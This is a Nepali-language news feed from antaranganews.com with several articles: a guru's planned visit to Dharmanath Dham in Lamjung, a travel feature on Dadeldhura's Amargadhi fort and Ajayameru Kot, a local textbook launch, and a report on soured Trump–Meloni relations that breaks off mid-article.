जगद्गुरू वालसन्त मोहनशरण देवाचार्य लमजुङ आउनु हुने https://www.antaranganews.com/?p=49904 https://www.antaranganews.com/?p=49904#respond Wed, 08 Jul 2026 12:51:31 +0000 https://www.antaranganews.com/?p=49904 पाउँदी(लमजुङ)– जगद्गुरु वालसन्त मोहनशरण देवाचार्य लमजुङ आउनु हुने भएको छ । नेपालको प्रचीन एवं ऐतिहासिक धार्मिक स्थल चतराधामका जगद्गुरू देवाचार्य सर्वोदय सेवाश्रम धर्मनाथ धाम (राइनस नगरपालिका– ८) लमजुङमा आउनुहुने असार २४ गते खुलासा भएको हो ।
धर्मनाथ धाममा हरेक बर्ष हुने श्रावणी स्नान बोलवम मेलाको यस बर्ष २०८३ को नेपालका प्रथम जगद्गुरु पीठ चतराधामका जगद्गुरु वालसन्त मोहनशरण देवाचार्य महाराजश्री समुद्घाटनका लागि आउनुहुने भएको हो । जगतगुरू स्वामी महाराजबाट आजै असार २४ गते धर्मनाथ धाम आउनुहुने दिव्य वचन पाएको उक्त आश्रमका संस्थापक अध्यक्ष कृष्णराज ओेलियाले बताउनुभयो । उहाँका अनुसार स्वामी महाराज मुक्तिनाथको कार्यक्रम पश्चात् चतारा फर्कने क्रममा मेलाकाे यस धाममा आई यहाँ हुने बोलवम यात्रा कार्यक्रमको शुभारम्भ गर्नुहुने तय भएको छ । ओलियाले भन्नुभयो, ‘केही दिनमा नै कार्यक्रमको मिति तय हुनेछ ।’ सम्पुर्ण महानुभावहरूलाई नेपालका प्रथम जगद्गुरुको दिव्य दर्शन र प्रवचन श्रवणका लागि तयारीमा रहन समेत ओलियाले आग्रह गर्नुभएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49904 0
सुुदूरपश्चिम : अमरगढी पर्यटन र अजयमेरु कोट https://www.antaranganews.com/?p=49855 https://www.antaranganews.com/?p=49855#respond Sat, 04 Jul 2026 13:58:21 +0000 https://www.antaranganews.com/?p=49855  पर्यटन प्रकृति, संस्कृति र हिमश्रृखलाको रमणीयतामा मात्र सीमित छैन । पर्यटनको क्षेत्रमा इतिहासको खोज र अनुसन्धानमा रमाउने पर्यटकहरूको रुचि पनि हुन्छ । इतिहास भनेको बितिसकेका सत्य घटनाहरूको यथार्थ विवरण हो, त्यसैले पर्यटनका लागि इतिहास सधैं खोजिरहनु पर्ने विषय बन्छ । तर सबै इतिहास देखिने हुँदैन । इतिहासका धेरै पाटा अदृश्य छन, धेरै ठाउँमा पुरातात्विक सम्पदाका कथा लुकेर बसेका छन । पर्यटन मूलतः अनुभूति र रोचकता सँग जोडिएको हुन्छ । यी अनुभूतिहरू समयसँगै पुराना हुँदैनन् । पर्यटनले इतिहासलाई वर्तमानसँग जोडछ । त्यसैले इतिहासका कुरा पनि वर्तमानका अवसर र भविष्यका सम्भावना बन्छन ।
पर्यटनको क्षेत्र शताब्दीऔँ पुराना भए पनि हरेक पुस्ताले नयाँ अनुभवका रुपमा लिने गर्दछन । पर्यटन केवल प्राकृतिक सौन्दर्यमा सीमित हुँदैन । ऐतिहासिक स्थलले पनि पर्यटकहरूलाई आकर्षण गर्दछ । पर्यटक जब कुनै ऐतिहासिक ठाउँमा पुग्दछ उसको लागि नयाँ अनुभव हुन्छ । पर्यटकहरूलाई नयाँ ठाउँका ऐतिहासिक र पुरातात्विक स्थल, धार्मिक सांस्कृतिक परम्परा र स्थानीय खानपानले आकर्षित गर्दछ । इतिहासमा रुचि राख्ने पर्यटकहरूलाई सुदूुरपश्चिममा डडेलधुराको अजयमेरु कोट र अमरगढीले जीवन्त इतिहास र पुरातत्व नियाल्ने दुर्लभ अवसर दिन्छ । पर्यटनको लागि डडेलधुरामा धेरै नलेखिएका इतिहास छन । डडेलधुराको नाम भूबनोटको आकारबाट राखिएको छ । स्थानीय बोलीमा ढाडलाई डडाल्नु र अग्लो ठाउँलाई धुरा भनिने हुँदा डडाल्नु जस्तो धुरा भन्दाभन्दै डडेलधुरा भएको हो । अर्कोतर्फ प्राकृतिक रुपमा दलिनजस्तो डाँडाले डडेलधुरा नाम दिएको छ । पहिले डडेलधुरालाई वागखोडा अर्थात बाघ गुफा, तल्लो खलंगा, मल्लो खलंगा र श्वार खलंगा भनिन्थ्यो । डडेलधुरा घुम्न जाँदा पर्यटकहरूले इतिहास, तीर्थाटन अथवा प्रकृति सम्पदा केलाई प्राथमिकता दिने भन्ने प्याकेज बनाउँदा यात्रा सहज र खर्च कम हुन्छ । इतिहासमा रुचि भएका पर्यटकले सदरमुकामको अमरगढी किल्ला र अजयमेरु कोट पुग्नै पर्ने हुन्छ । अर्कोतर्फ प्रकृति मेमी पर्यटकहरूले आलीताल, चिपुर र भद्रपुर देवल, साइल झरना, कुयलगाड झरना, लालीगुराँसको जंगल पुग्न सके राम्रो हुन्छ ।
कैलालीको अत्तरिया चोकबाट डडेलधुरा जाँदा भासु भिरको नाम प्रायः सबैले सुनेका हुन्छन । तर, धेरैजसो यात्रुहरू यहाँ रोकिएर हेर्न नै डराउँछन । नयाँ पर्यटकहरूका लागि भासु भिर आयो भन्ने सुन्नासाथ मनमा डर र कौतूहल एकैपटक पलाउँछ । गोदावरी धामबाट करिब २५ किलोमिटरको नागबेली उकालो पार गरेपछि खानीडाँडा हुँदै पुगिने ठाडो पहरोलाई भासु भिर भनिन्छ । पहिले पहिले मालबाहक ट्रकका चालकहरू भिरको फेदीमा रहेको भासु माताको थानमा धूप बालेर मात्र उकालो लाग्थे । भासु भिरको बीचबाटै राजमार्ग गएको छ । दायाँतिर ठाडो पहरो छ, बायाँतिर गहिरो खोँच, सडक साँघुरो छ, घुम्ती धेरै छन । त्यसैले धेरै पर्यटक भासु भिरलाई साहसिक यात्रा मान्छन । डरलाग्दो भए पनि यहींबाट तल तराईका फराकिला फाँट र माथि चुरेको हरियो काख एकै फ्रेममा पर्यटकहरूले देख्दछन । बिहानको कुहिरोमा भासु भिरले देखाउने नाटकीय दृश्य खिच्न फोटोग्राफर पर्यटकहरूले विशेष रुचि देखाउछन । गोदावरीबाट करिब २५ किलोमिटरमा खानीडाँडा पुगिन्छ, त्यहाँबाट करिब ५ किलोमिटर उत्तर लागेपछि भासु भिर आइपुग्छ । सामान्य बोलचालमा खानीडाँडाको उकालो सुरु भएदेखि सहजपुर नजिकसम्मको करिब चार पाँच किलोमिटर लामो घुम्ती र भिरैभिरको खण्डलाई नै भासु भिर क्षेत्र भन्ने चलन छ ।
डडेलधुरा पुग्ने पर्यटक इतिहासमा चासो राख्छन । विशेषगरी किसान नेता भीमदत्त पन्तबारेमा जान्न खोज्दछन । वि.सं.१९८३ मंसिर १० मा अमरगढीको कारीगाउँमा जन्मिएका पन्तको २०१० सालमा डोटी–डडेलधुरा सीमाको बुडर गल्लेकमा हत्या भएको थियो । बडाहाकिम मोहनसिंहको आदेशमा लालबहादुर थापा नेतृत्वको टोलीले खाना खाँदै गरेका बेला गोली हानी टाउको काटेर खलंगाको भैरव मन्दिरनजिक बाँसको बोटमा झुन्डयाएको थियो । यो निर्मम घटना सुन्दा पर्यटकहरू क्षणभर भावविह्वल हुन्छन । डडेलधुरामा इतिहासमा रुचि राख्ने र प्रकृतिसंग रमाउने पर्यटकहरू पुग्ने गर्दछन । डडेलधुरामा मूर्त अमूर्त सांस्कृतिक सम्पदा, संस्कार एवं परम्परागत रहनसहन, इतिहासमा रुचि भएका र शोधपत्र तयार गर्ने पर्यटकहरू डडेलधुरा पुग्दछन । डडेलधुराको सांस्कृतिक सम्पदा, संस्कार र परम्परागत शाश्वत मूल्य मान्यताहरु अन्य जिल्लाबाट गएका पर्यटकहरूका लागि नौलो मानिन्छ । पर्यटनको क्षेत्रमा केहि पुर्वाधारको विकास र सुविधाजनक होटलको व्यवस्था हुन थालेपछि डडेलधुरामा आजभोलि वाह्य पर्यटकहरू पनि पुग्ने गर्दछन । विशेष गरेर चाडपर्वका बेला धार्मिक, सांस्कृतिक गतिविधि हुने हुनाले त्यसबेला पर्यटकहरू अन्य समय भन्दा बढी जाने गर्दछन ।
डडेलधुरा आफैमा प्राकृतिक सुन्दरता भएको भूगोल हो । तराइ अथवा भारतबाट घुम्नको लागि डडेलधुरा पुग्ने पर्यटकहरू प्राकृतिक सुन्दरतादेखि रमाउने गर्दछन । डडेलधुरा जिल्ला अपी हिमाल, बडीमालिका, बैजनाथ धाम जस्ता सुदूरपश्चिमको प्रसिद्ध पर्यटकीय स्थलहरू अवलोकन गर्न जाने प्रमुख द्वार पनि हो । प्रकृतिले सजिएको डडेलधुरा हिमाली जिल्ला त होइन तर डडेलधुराको विभिन्न उच्च पहाडी स्थानबाट दार्चुलाको अपि हिमाल र बझाङमा पर्ने साइपाल हिमाल अवलोकन गर्न सकिन्छ । डडेलधुराको यात्रामा पर्यटकहरूलाई खानाबस्नको लागि कुनै असुबिधा हुदैन । पर्यटकहरूले यात्रामा बुडरमा जोराइली चामलको दाल–भात, स्याउलेमा सेलरोटी–अचार, साहुखर्कमा खिर, पल्टुडेमा ठूलीगाडको माच्छा र डडेलधुरामा गौतामे डुप्का र लोकल कुखुराको झोलको स्वाद लिन पाउने छन । डडेलधुराको अमरगढी किल्ला ऐतिहासिक किल्ला हो । डडेलधुरा पुगेपछि अमरगढी किल्लाको अवलोकन नगरे पर्यटकहरूको यात्रानै अधुरो हुन्छ ।
डडेलधुरामा पर्यटकहरू पहिला अमरगढी किल्लामा पुग्दछन । अमरगढी किल्ला प्राकृतिक भ्युटावर हो । जहाँबाट डडेलधुरा बजार वरपरका धेरै भूभाग अवलोकन गर्न सकिन्छ । अमरगढी किल्लाको निर्माण श्री ५ रणबहादुर शाहको शासन काल तथा राजकुमार बहादुर शाहको नायवीमा सञ्चालित नेपाल एकीकरणको क्रममा बि.सं.१८४७ मा डोटेली सैनिकसंग गोर्खाली सैनिकको युद्ध भयो । युद्धमा डोटेली फौज पराजित भइसकेपछि डोटी राज्य पनि बिशाल नेपाल अधिराज्यमा गाभिन पुग्यो । युद्वकालीन समयमा भूगोल र सुशानलाई सुदृढ र विस्तार गर्न अमरसिंह थापा प्रथम प्रशासनको रुपमा नियुक्ति भए । उनले यस क्षेत्रको संरक्षण र महाकाली पारी पनि विजय अभियानलाई जारी राख्न अमरगढी किल्लाको निर्माण गरेका हुन । अमरगढीलाई आधार मानी उनले अल्मोडा, गढवाल र काँगडासम्म राज्य विस्तार गरेका थिए । विजय अभियानको समाप्तिपछि अमरगढीको मातहतमा रहने गरी एउटा किल्ला कुमाउमा पनि राखिएको थियो । अमरसिंह थापाद्वारा निर्माण गरिएको किल्ला कलात्मक र चारै तिर ढुङगाले निर्माण भएको छ । किल्लाभित्र तोप, बन्दुक, घरेलु भाला, गोलालगायतका हातहतिया थिए । तर ती युद्ध सामग्रीहरू पर्यटकहरूले अहिले देख्न सक्दैनन । किल्ला भित्र गुफाहरू पनि बनाइएको छ । आजभोलि किल्ला माथि रुख विरुवाले रमणीय वातावरण बनाइ दिएको छ । ऐतिहासिक किल्लाका विच भागमा उग्रभैरवको मन्दिर पनि छ । धार्मिक र सामरिक महत्व भएकोले पर्यटकहरूलाई इतिहासको छुट्टै अनुभुति हुने गर्दछ ।
अमरगढी किल्ला पछि धेरै पर्यटकहरू अजयमेरू कोट पुग्दछन । अजयमेरु कोट डडेलधुरा बजारदेखि करिब ७ किलोमिटर पश्चिम, अजयमेरु गाउँपालिकाको हाटगाउँ र गाड खोलाको बीचमा पर्दछ । सुदूरपश्चिमकै गौरवशाली पुरातात्विक सम्पदा हो अजयमेरु कोट । संस्कृतको अजेयु र मेरु मिलेर बनेको अजयमेरु कोट जित्न नसकिन किल्ला हो । १२ औं १३ औं शताब्दीतिर शक्तिशाली डोटी राज्य उदाएपछि डोटेली मल्ल राजाहरूले अजयमेरुलाई मुख्य प्रशासनिक केन्द्र र शीतकालीन राजधानी बनाएका थिए । अजयमेरु कोटमा वि.सं.१४१९ सम्म कत्युरी पाल वंशको क्षेत्रीय दरबार थियो । त्यसपछि बि.सं.१४४१ मा रैका राजा नागी मल्लले कब्जा गरेपछि अजयमेरु कोटलाई नागीकोट र  हाँटकोट पनि भन्न थालियो । जुनकुरा राजा निरयपालदेवका ताम्रपत्र र शिलालेखमा पाइन्छ । प्रकृतिले बनाएको रणनीतिक किल्ला अर्थात अजयमेरु कोट तीनैतिर भीर र गाड खोलाले घेरिएको अग्लो टुप्पोमा रहेको छ । अजयमेरुकोटमा प्राचीन दरबारको भग्नावशेष, नाउला, देवल, वीरखम्ब, कलात्मक सिलिङ, राजाको बैठकस्थलसहितका ऐतिहासिक वस्तु छरिएर रहेका छन ।
अजयमेरुमा रहेका तीन नाउलामध्ये दुई नाउलाको भग्नावशेष मात्र छन । एक नाउला पानी खान प्रयोग भइरहेको छ । ढुंगे देवल र नाउलामा कुँदिएका कलात्मक मूर्तीले प्राचीन वास्तुकला झल्काउँछ । अजमेरुकोटको मुख्य दरबार भएको स्थान तल गाडदेखि माथि कोट भएको स्थानमा पुग्न २० मिनेट उकालो यात्रा गर्नु पर्दछ । कोट भएको डाँडामाथि दरबार र राजाका भाइभारदार बस्ने हवेली भग्नावशेषका रुपमा देखिन्छन । दरबारको संरचना सबै भत्केको अवस्थामा छ । अजयमेरु कोट पुरातत्व विभागले उत्खनन सुरु गरेपछि कत्युरीकालीन उत्कृष्ट कलाशैली बाहिर आएको छ । अजयमेरु कोट भनिए पनि कोट मात्रै नभएर दरबारका भग्नावशेषहरू, डबलीहरू, सुरक्षा गर्न बनाइएका टावरहरू, रानी गुफा, कुवाहरू राजदरबारसँग सम्बन्धित थुप्रै संरचनाहरू उत्खनन गरेको स्थानमा रहेका छन । अजयमेरु कोटमा आजभोलि ऐतिहासिक वा कलात्मक वस्तुहरू हेर्नको लागि पर्यटकहरू पुग्ने गर्दछन । प्राचीन अजयमेरु कोटलाई विश्व सम्पदा सूचीमा राख्न पर्दछ भन्ने इतिहासकारहरूले बताएका छन ।
डडेलधुरा पुगेपछि पर्यटक पुग्नै पर्ने स्थान हो उग्रतारा मन्दिर । उग्रतारा मन्दिर अमरगढी नगरपालिकामा पर्दछ । उग्रतारा भगवती मन्दिर प्यागोडा शैलीमा निर्मित छ । यो मन्दिर डडेलधुरा–बैतडी राजमार्गको पश्चिम पट्टीको रमणिय फाटमा रहेको छ । उग्रतारा भगवतीको उत्पत्ती किसानले हलो जोत्दा भएको मानिन्छ । धार्मिक विश्वास अनुसार हलोको फाली सिलामा गढेर सिलाबाट निरन्तर रगतको धारा बग्दा खोला बग्न शुरु भयो । हाल पनि यो खोला यहि मन्दिरका तलन्वाखोलाको नामले चिनिन्छ । उग्रतारालाई नीलसरस्वतीका रुपमा पनि मान्ने गरिन्छ । उग्रताराको पूजा वैदिक र तान्त्रिक दुवैविधिद्वारा गरिन्छ । उग्रतारा भगवती शीलाका रुपमा उत्पन्न भएको मानिन्छ । उग्रताराको शिला गर्भगृहमा स्थापित छ । कुनै पनि दिन यी देवीलाई अपुज अर्थात अर्चनाविहीन बनाउनु हुँदैन भन्ने मान्यता रहेको छ । उग्रतारा मन्दिरमा साँकीजातका क्षेत्रीय मुख्य पुजारी र ३ थरी भट्ट र १ पन्त थरीका छुट्टाछट्टै ४ व्राह्मणलाई सहायक पुजारी तोकिएको छ । यहाँबाट देखिने कश्यप, अपि, सैपाल हिमालको दृश्यावलोकन र डाँडाबाट देखिने प्राकृतिक सुन्दरताले पर्यटकहरूलाई लोभ्याइ दिन्छ । उग्रतारा मन्दिरमा बडा दशैंको महाअष्ठमीमा मेला लाग्ने गर्दछ ।
डडेलधुरामा सांस्कृतिक पर्वमा गौरा प्रमुख पर्व हो । गौरा पर्व सुदूरपश्चिमकै साझा पर्व भए पनि डडेलधुराको रौनक र आत्मीयता बेग्लै देखिन्छ । कतिपय पर्यटकहरू गौरा पर्वकै लागि डडेलधुरा पुग्ने गर्दछन । गौराका लागि परदेशिएकाहरू पनि घर फर्कन्छन, अनि गाउँ र बस्ती देउडाले गुञ्जिन्छ । गौरा पर्व भाद्र कृष्ण पञ्चमीमा घरमा भिजाइएको बिरुडा गहुँ, केराउ, गहत, मास र गुराँस सप्तमीमा मन्दिर लगेपछि पर्व सुरु हुन्छ । व्रतालुले शिव पार्वती स्वरुप गौरा महेश्वरको पूजा गर्दै व्रत बस्छन, मनोकामना पूरा हुने र घरमा सुख सौभाग्य आउने विश्वास गर्दछन । बिशेष गरी बजार वरपरका कारीगाउँ, सेलागाउँ, जीलोडा, हतर्क, मौराडा, जैसेरामा देउडा हेर्नकै लागि पर्यटक जम्मा हुन्छन । पूजापछि बाजागाजासहित देउडा, चैत, हुडकेउली, धमारी चल्छ । एकातिर केटा, अर्कातिर केटी तालमा ताल, पाइलामा पाइला मिलाउँदै दोहोरीमा सवाल जवाफ चल्दा पर्यटकहरूलाई रात बितेको पत्तै हुँदैन । यही मौलिक लय नै सुदूरपश्चिमको पहिचान हो, पाहुनाका लागि नौलो र रमाइलो अनुभव ।
पर्यटनका लागि डडेलधुरा प्राकृतिक, सांस्कृतिक, धार्मिक र ऐतिहासिक रुपमा समृद्ध छ । पर्यटकहरूले आफ्नो यात्राको समय बढाउन सके अमरगढी किल्ला, अजयमेरुकोट, उग्रतारा मात्र होइन डडेलधुरामा घटालबाबा, समैजी, आलिताल, परशुराम धाम, गन्यापधुरा, भागेश्वर, डागेश्वरी, नवदुर्गा, सहस्रलिंगलगायतका सम्पदाहरूमा पनि पर्यटकहरू पुग्न सक्दछन । पछिल्लो समय डडेलधुरा पर्यटनको लागि पूर्वाधारको बिकास हुँदै गएको छ । स्थानीयले डडेलधुरालाई भारतको नैनीतालसँग तुलना गर्छन । किनभने डडेलधुरा गर्मी छल्न मिल्ने हावापानी र प्राकृतिक सौन्दर्यले भरिएको छ ।
कसरी पुग्ने डडेलधुरा ?
डडेलधुरा जान कैलालीको अत्तरिया अथवा महेन्द्रनगरदेखि दैजी–जोगबुढा सडक हुँदै बुडर भएर पनि डडेलधुरा सदरमुकाम पुग्न सकिन्छ । दैजी हुँदै जोगबुढामा जादा महाकाली किनारामा रहेको परशुराम धामसँगै महाभारत पर्वतमाथि रहेको प्रसिद्ध आलीतालको आनन्दलिंदै डडेलधुरासम्म पुग्न सकिन्छ । अर्कोतर्फ मध्यपहाडी लोकमार्ग भएर सुर्खेत, अछाम र डोटी भएर पनि डडेलधुरा पुग्न सकिन्छ । तर पनि पुरानो सडक भनेको अत्तरिया–डडेलधुरा नै हो । अत्तरिया चोकवाट डडलेधुरा बजारको दुरी ११५ कि.मि.पर्दछ । डडेलधुरा जाँदा गोदावरीको समेत पर्यटकहरूले अवलोकन गर्न सक्दछन । अत्तरिया चोकदेखि बसमा चार घण्टाको यात्रामा डडेलधुराको सदरमुकाममा पुग्न सकिन्छ ।
(लेखक : लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
]]>
https://www.antaranganews.com/?feed=rss2&p=49855 0
मर्स्याङ्दी गाउँपालिकाले तयार गरेको स्थानीय पाठ्य पुस्तक ‘हाम्रो मर्स्याङ्दी’को विमोचन https://www.antaranganews.com/?p=49851 https://www.antaranganews.com/?p=49851#respond Sat, 04 Jul 2026 11:02:14 +0000 https://www.antaranganews.com/?p=49851 भूलभूले(लमजुङ)– लमजुङको मर्स्याङ्दी गाउँपालिकाले तयार गरेको ‘हाम्रो मस्र्याङ्दी’ नामक पाठ्यपुस्तकको विमोचन भएको छ । गाउँपालिका अध्यक्ष अर्जुन गुरुङ, उपाध्यक्ष जुनामाया थापा, प्रमुख प्रशासकीय अधिकृत विज्ञान पौडेल र सामाजिक विकास समिति संयोजक एवम् वडा ७ का वडाअध्यक्ष तिलबहादुर गुरुङलगायतले संयुक्त रुपमा पाठ्यपुस्तकको असार २० गते विमोचन गर्नु भएको हो ।
चालु शैक्षिक सत्रदेखि पठनपाठन सुरु गरिएको उक्त पाठ्यपुस्तक २१ औँ गाउँसभाको अवसरमा आयोजित कार्यक्रममा विमोचन गरिएको हो । उक्त पाठ्यपुस्तक बारेमा प्रकाश पार्दै गाउँपालिका अध्यक्ष गुरुङले स्थानीय इतिहास, भूगोल, संस्कृति, प्राकृतिक सम्पदा, पर्यटन, आर्थिक गतिविधि, स्थानीय पेशा– व्यवसाय, यातायात तथा भौतिक पूर्वाधार, जीवनोपयोगी सीप रहेको जानकारी दिनु भयो । उहाँका अनुसार सो पुस्तकमा मानव मूल्यमा आधारित शिक्षा, स्थानीय परिकार र समसामयिक विषयबारे विद्यार्थीलाई व्यवहारिक ज्ञान दिने उद्देश्यले पाठ्यपुस्तक तयार पारिएको हो ।
उहाँले भन्नुभयो, ‘चालु शैक्षिक वर्षदेखि कक्षा ८ सम्म स्थानीय पाठ्यक्रम विस्तार गर्दै त्यसअनुसारको पाठ्यपुस्तक तयार गरिएको हो ।’ यसले विद्यार्थीलाई आफ्नै गाउँ, समाज र परिवेशबारे ज्ञान हासिल गर्न सहयोग पुग्ने विश्वास गरिएको उहाँले उल्लेख गर्नुभयो ।
उपाध्यक्ष जुनामाया थापाले पाठ्यपुस्तकले विद्यार्थीमा आफ्नै गाउँ, समाज र संस्कृतिप्रति गर्व, अपनत्व र जिम्मेवारीको भावना अझ सुदृढ बनाउने विश्वास व्यक्त गर्नु भयो । आधारभूत तह कक्षा १ देखि ८ सम्मका विद्यार्थीका लागि स्थानीय पाठ्यपुस्तक निर्माण गरेको गाउँपालिकाले जनाएको छ ।
यसअघि गाउँपालिकाले स्थानीय पाठ्यक्रम तयार गरी कक्षा १ देखि ५ सम्म पठनपाठन सुरु गरिेको थियो । अहिले गाउँपालिकाभित्रका ५५ विद्यालयमा ‘हाम्रो मर्स्याङ्दी’को पठनपाठन भइरहेको गाउँपालिकाले जनाएको छ ।
पालिकाका बारेमा गहिरो अध्ययन, छलफल र सुझावका आधारमा स्थानीय पाठ्यक्रमको मापदण्डअनुसार पुस्तक तयार गरिएको गाउँपालिकाका प्रमुख प्रशासकीय अधिकृत पौडेलले बताए । उनका अनुसार भूमिदत्त पौडेलको लेखन संयोजनमा तयार भएको पुस्तकको सम्पादन ऋषिराम श्रेष्ठ, इश्वरबाबु पाण्डेलगायतले गर्नु भएको हो ।
पाठ्यपुस्तकमा गाउँपालिकाको इतिहास, भूगोल, पर्यटकीय तथा धार्मिक स्थल, संस्कृति, रहनसहन, भेषभूषा, विशिष्ट व्यक्तित्व, कृषि, वन पैदावार, जडीबुटी, खनिज पदार्थ, प्राकृतिक स्रोत, पशुपालन तथा स्थानीय कला–संस्कृतिसम्बन्धी विषय समेटिएको गाउँपालिकाले जनाएको छ ।
सामाजिक विकास समिति संयोजक तिलबहादुर गुरुङले स्थानीय ज्ञान, पहिचान र गौरवलाई विद्यालय शिक्षासाग जोड्ने यो प्रयास गाउँपालिकाको शिक्षा क्षेत्रका लागि ऐतिहासिक उपलब्धि भएको बताउनु भयो ।
जम्मा आठ इकाईमा विभाजन गरिएको ‘हाम्रो मर्स्याङ्दी’ पुस्तक कक्षा– १ कोमा एक ९ पेज रहेको छ भने कक्षा– ८ का लागि २०९ पेजमा छपाई भएको सो पुस्तक लेखनमा जुटेका प्रभात शान्तिपूर्ण माविका प्रधानाध्यापक ईश्वरबाबु पाण्डेले जानकारी दिनु भएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49851 0
बिग्रियो ट्रम्प र मेलोनी सम्बन्ध : सुध्रन कठिन https://www.antaranganews.com/?p=49733 https://www.antaranganews.com/?p=49733#respond Mon, 29 Jun 2026 12:04:07 +0000 https://www.antaranganews.com/?p=49733 काठमाडौं– इटालीको सामाजिक सञ्जालमा कृत्रिम बुद्धिमत्ता (एआई)मार्फत बनाइएको एउटा मिम यतिबेला निकै भाइरल छ । यी तस्बिर वास्तविक नभए पनि इटालीमा निकै चर्चित बनेका छन्, किनभने तिनले प्रधानमन्त्री मेलोनी र अमेरिकी राष्ट्रपति डोनाल्ड ट्रम्पबीच सार्वजनिक रूपमा चिसिएको राजनीतिक सम्बन्धलाई व्यंग्यात्मक रूपमा चित्रण असार १५ गते गरिएको छ ।
उक्त मिममा इटालीकी प्रधानमन्त्री जर्जिया मेलोनीलाई भर्खरै सम्बन्धविच्छेद भोगेकी व्यक्तिका रूपमा चित्रण गरिएको छ । एउटा नक्कली तस्बिरमा उनको नयाँ हेयरस्टाइल देखाइएको छ । अरू तस्बिरमा उनलाई ‘सिंगल्स होलिडे’ बुक, म्याराथनको तयारी गर्दै र डेटिङ एपमा आफ्नो प्रोफाइल बनाउँदै गरेको देखाइएको छ ।
केही समय अघिसम्म मेलोनीलाई ‘ट्रम्पलाई सम्झाउन सक्ने नेता’का रूपमा चित्रण गरिन्थ्यो । सन् २०२५ को जनवरीमा ट्रम्पको शपथग्रहण समारोहमा अग्रपंक्तिमा बस्ने उनी एक मात्र युरोपेली नेता थिइन् । त्यसपछि अप्रिलमा अमेरिकी ट्यारिफसम्बन्धी विवाद समाधानको प्रयासस्वरूप ह्वाइट हाउस भ्रमण गर्ने युरोपेली संघका नेतामध्ये पनि उनी पहिलो रोजाइमा परेकी थिइन् ।
पछिल्ला केही महिनादेखि उनीहरूबीच सार्वजनिक आरोप–प्रत्यारोप र व्यक्तिगत टिप्पणी बढ्दै गएका छन् । सोही कारण एक समय युरोपेली राजनीतिमा सबैभन्दा चर्चित मानिएको यो गठबन्धन हाल गम्भीर संकटमा परेको छ ।
इटालीको पोस्ट–फासिस्ट राजनीतिक पृष्ठभूमिबाट उदाएकी मेलोनीले आफूलाई युरोपेली दक्षिणपन्थी राजनीतिमा एक विश्वसनीय र मध्यमार्गी नेताका रूपमा स्थापित गर्ने प्रयास गर्दै आएकी छन् ।
ट्रम्पसँगको निकटता उनका निम्ति कूटनीतिक सम्बन्ध मात्र थिएन, अन्तर्राष्ट्रिय राजनीतिक मञ्चमा आफ्नो प्रभाव स्थापित भएको संकेत पनि थियो । तर, ट्रम्पको अप्रत्याशित शैली र सार्वजनिक अभिव्यक्तिले मेलोनीका निम्ति यो सम्बन्ध जोगाउन कठिन बनाइदिएको छ । यसले राष्ट्रिय तथा अन्तर्राष्ट्रिय रूपमा उनको विश्वसनीयतामै असर पारेको विश्लेषण भइरहेको छ ।
पहिलो दरार : सैन्य बेसको विवाद 
दुवै नेताबीचको पहिलो ठूलो मतभेद गएको मार्चको अन्त्यतिर इटालीको रक्षा मन्त्रालयले पश्चिम एसियातर्फ जाने अमेरिकी सैन्य विमानहरूलाई सिसिलीस्थित नेटोको सिगोनेला एयरबेस प्रयोग गर्न अनुमति दिन अस्वीकार गरेपछि देखिएको थियो । इटालीको संविधान र युद्धप्रति त्यहाँको जनमतलाई ध्यानमा राख्दै संसद्को स्वीकृतिबिना यस्तो अनुमति दिन नसकिने अडान रोमले लिएको थियो ।
केही सातापछि विवाद अझ चर्कियो । अप्रिलमा ट्रम्पले युद्धको आलोचना गरेको भन्दै पोप लियो चौधौँमाथि आफ्नो सामाजिक सञ्जाल ट्रुथ सोसियलमार्फत आक्रमण गर्दै उनलाई ‘अपराधप्रति कमजोर’ भने । कट्टर क्याथोलिक देश इटालीकी प्रधानमन्त्री मेलोनीले ट्रम्पको उक्त टिप्पणीलाई ‘अस्वीकार्य’ बताइन् ।
ट्रम्पले त्यसपछि इटालीको दैनिक पत्रिका कोरिएरे डेला सेरासँगको अन्तर्वार्तामा भने, ‘म उनीप्रति स्तब्ध छु । मैले उनलाई साहसी नेताका रूपमा सोचेको थिएँ, तर म गलत रहेछु । उनी पहिलेजस्ती व्यक्ति रहिनन् र इटाली पनि पहिलेजस्तो देश रहेन ।’
जी– ७ शिखर सम्मेलनपछि फेरि नयाँ विवाद :
जुन महिनामा फ्रान्सको एभियान–लेस–बेन्समा आयोजित जी–७ शिखर सम्मेलनमा ट्रम्प र मेलोनी सोफामा बसेर गम्भीर छलफल गरिरहेको तस्बिर सार्वजनिक भएपछि सम्बन्ध सुधारिएको अनुमान गरिएको थियो ।
इटालीका अधिकारीले दुवै नेताबीच सकारात्मक र स्पष्ट छलफल भएको बताएका थिए । मेलोनीले पनि वातावरण ‘निकै सकारात्मक’ रहेको प्रतिक्रिया दिएकी थिइन् । तर, केही दिनमै नयाँ विवाद सुरु भयो । ट्रम्पले इटालीको टेलिभिजन च्यानल ला ७ लाई दिएको टेलिफोन अन्तर्वार्तामा मेलोनीले सम्मेलनमा आफूसँग तस्बिर खिचाउन ‘भिख मागेको’ जिकिर गरे ।
ट्रम्पले भनेका थिए, ‘उनी मसँग तस्बिर खिचाउन निकै मरिहत्ते गरिरहेकी थिइन्, म इच्छुक थिइनँ । तर, अन्ततः उनको आग्रह स्वीकार गरेँ ।’ जवाफमा मेलोनीले इटालेली भाषामा भिडियो सन्देश जारी गर्दै ट्रम्पको भनाइलाई ‘पूर्ण रूपमा कपोलकल्पित’ बताइन् ।
उनले भनिन्, ‘अमेरिकी राष्ट्रपतिले आफ्ना सहयोगीहरूसँग किन यस्तो व्यवहार गर्छन्, मलाई थाहा छैन । तर, एउटा कुरा स्पष्ट छ, म र मेरो देश इटालीले कहिल्यै कसैसँग भिख माग्दैन ।’ यो घटनापछि इटालीका विदेशमन्त्री एन्टोनियो ताजानीले आफ्नो पूर्वनिर्धारित वासिङ्टन भ्रमण समेत रद्द गरेका थिए ।
इटालीमा तीव्र प्रतिक्रिया :
